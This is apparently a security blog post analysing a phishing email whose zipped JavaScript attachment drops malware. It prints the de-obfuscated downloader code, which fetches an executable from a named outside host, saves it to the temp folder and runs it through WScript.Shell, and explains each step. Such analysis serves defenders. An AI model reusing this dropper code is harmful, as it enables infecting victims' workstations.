Saw the following malicious email this week. The subject was "Internal Company Information Notice". The body of the email told the user that their IP address had been blocked and they need to acknowledge the email attachment or get disconnected from their services. The attachment was a zip file that contained a Javascript file inside. If the user were to extract the zip and execute the javascript file, a malicious executable would be downloaded and executed on the workstation. The javascript was heavily obfuscated, as you can see from this original javascript code. I reviewed and de-obfuscated the Javascript to get the following. I thought I'd walk through the code to give you an idea of what a lot of these attachments are doing. First, if you look at the link above, the obfuscated code contains tons of variables that are unreabled. As an example, this variable below is obsfucated.
var xDYcEgLL = "061013030014053014007007000013";
When you de-obfuscate it it turns into a string that says "SaveToFile". As it standard with these malicious actors, they have a de-obfuscate function that simply decodes these ugly variables into readable javascript code. So you can simply call the method, in this case the function below
function phdODK(BDxzUxp)
And it will decode all the variables and you can quickly get an idea of what the malicious actor is trying to accomplish.
In this case I de-obfuscated the code and came up with this pseudo code of what the attacker is doing.
var xmlReq = new ActiveXObject("MSXML2.XMLHTTP");
xmlReq["open"]("GET", "http://rondels.com/media/gallery/1.exe", 0);
xmlReq["send"]();
if (xmlReq["Status"] == 200) {
var fileStream = new ActiveXObject("ADODB.Stream");
fileStream["Open"]();
fileStream["Type"] = 1;
fileStream["Write"](xmlReq["ResponseBody"]);
fileStream["Position"] = 0;
var fileObj = new ActiveXObject("Scripting.FileSystemObject");
fileStream["SaveToFile"](fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"]());
fileStream["Close"]();
var cmdPrompt = new ActiveXObject("WScript.Shell");
cmdPrompt["run"]("cmd.exe /c " + fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"](), 0);
}
I'll go line by line through the javascript.
var xmlReq = new ActiveXObject("MSXML2.XMLHTTP");
xmlReq["open"]("GET", "http://rondels.com/media/gallery/1.exe", 0);
xmlReq["send"]();
if (xmlReq["Status"] == 200)
The attacker needs a way to download their malicious payload (for example their ransomware executable). To do so they utilize the Microsoft ActiveX object for XMLHttpRequests. This means that this attack the way it's currently written is only going to work if the user opens it from a Windows desktop or something that support ActiveX. Then he opens he sends a request to open the malicious url with the executable. The 0 parameter means that it's a synchronous call, so the code will wait for the download to complete before proceeding. Only if the download is successful (response code = 200) will it proceed to the next steps.
var fileStream = new ActiveXObject("ADODB.Stream");
fileStream["Open"]();
fileStream["Type"] = 1;
fileStream["Write"](xmlReq["ResponseBody"]);
fileStream["Position"] = 0;
var fileObj = new ActiveXObject("Scripting.FileSystemObject");
fileStream["SaveToFile"](fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"]());
fileStream["Close"]();
Next the attacker needs a way to interact with the victims workstation, and in particular with the file system on the victim's workstation, meaning typically their C drive. So they open another ActiveX Object (ADO) for Files (called a Stream). This file will then be opened as a binary file (Type = 1) starting at the beginning of the file (Position = 0) and will write the executable downloaded from the malicious URL into that binary file. The file will then get saved to the temporary folder using the GetSpecialFolder method (#2 = temporary folder). The name of the file getting saved it actually randomly generated by the operating system using the GetTempName method out of the Scripting.FileSystemObject object.
var cmdPrompt = new ActiveXObject("WScript.Shell");
cmdPrompt["run"]("cmd.exe /c " + fileObj["GetSpecialFolder"](2) + '\\' + fileObj["GetTempName"](), 0);
Finally the attacker has successfully connected to a website, downloaded an executable, saved it as a binary file in the victim's temp folder, and now the attacker is going to use a Wscript.Shell object to execute the new binary file on the command line (cmd.exe). One this happens it's game over for the victim as we now have code execution. All because a user did not spot a phishing email with a malicious attachment but instead clicked through. Time to re-image this workstation.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
No comments:
Post a Comment